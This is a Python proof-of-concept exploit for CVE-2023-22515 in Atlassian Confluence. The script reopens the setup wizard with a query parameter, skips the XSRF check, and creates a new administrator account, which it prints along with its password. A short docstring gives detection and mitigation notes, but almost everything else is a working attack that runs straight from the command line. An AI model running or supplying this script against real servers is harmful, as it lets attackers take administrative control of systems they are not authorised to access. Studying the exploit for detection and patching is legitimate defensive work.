"""Proof-of-concept client for CVE-2023-22515 (Atlassian Confluence).

Request sequence implemented by ``exp``:

1. GET  /server-info.action with the query parameter
   ``bootstrapStatusProvider.applicationConfig.setupComplete=false``
2. POST /setup/setupadministrator.action with an administrator sign-up form
3. POST /setup/finishsetup.action

Defender notes:

* Detection: the three request paths above are the observable footprint.
  Look for them in reverse-proxy / access logs of an instance that has
  already completed setup, and audit the ``confluence-administrators``
  group for accounts nobody provisioned.
* Mitigation: install the fixed release named in the vendor advisory for
  CVE-2023-22515; until then, deny external access to ``/setup/*``.
* The script echoes the supplied password to stdout and reads it from
  argv, so it ends up in terminal scrollback and shell history.
"""
import sys

import requests


def exp(url, username, password):
    """Run the three-request sequence against ``url`` and print the outcome.

    Args:
        url: Base URL of the Confluence instance; one trailing "/" is dropped.
        username: Account name, also reused for fullName and the e-mail local part.
        password: Password submitted in both the password and confirm fields.

    Returns:
        None. Results are reported with ``print`` only.
    """
    # "no-check" asks Confluence to skip its XSRF token validation.
    xsrf_header = {"X-Atlassian-Token": "no-check"}
    form_headers = {
        **xsrf_header,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # Values are interpolated as-is (no URL-encoding), exactly as submitted.
    form_body = (
        f"username={username}&fullName={username}&email={username}@localhost"
        f"&password={password}&confirm={password}&setup-next-button=Next"
    )

    # Strip a single trailing slash so the path joins below stay well-formed.
    base = url[:-1] if url.endswith('/') else url

    # Step 1: the response is not inspected; only the request itself matters.
    # On a vulnerable instance this parameter reopens the setup wizard.
    requests.get(
        url=base + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    )

    # Step 2: submit the administrator form without following the redirect,
    # because the Location header is the success signal.
    admin_resp = requests.post(
        url=base + "/setup/setupadministrator.action",
        headers=form_headers,
        data=form_body,
        allow_redirects=False,
    )
    redirect_target = admin_resp.headers.get("Location")
    if redirect_target != "/setup/finishsetup.action":
        # "Failed to create user!" followed by the raw redirect and status.
        # NOTE(review): these two diagnostics are placed in the failure branch;
        # the page lost its indentation, so confirm against the upstream file.
        print("创建用户失败!")
        print(redirect_target)
        print(admin_resp.status_code)
        return

    # Step 3: close the setup wizard again.
    finish_resp = requests.post(
        url=base + "/setup/finishsetup.action",
        headers=xsrf_header,
    )
    if finish_resp.status_code != 200:
        # "An unexpected error occurred!"
        print("发生意料之外的错误!")
        return

    # "Administrator account created successfully!" / "Credentials: user/pass"
    print("管理员账户创建成功!")
    print("账户密码为: " + username + "/" + password)


if __name__ == '__main__':
    if len(sys.argv) != 4:
        # "Usage: ..."
        print("用法: python3 CVE-2023-22515.py url username password")
        sys.exit(1)
    url, username, password = sys.argv[1:]
    exp(url, username, password)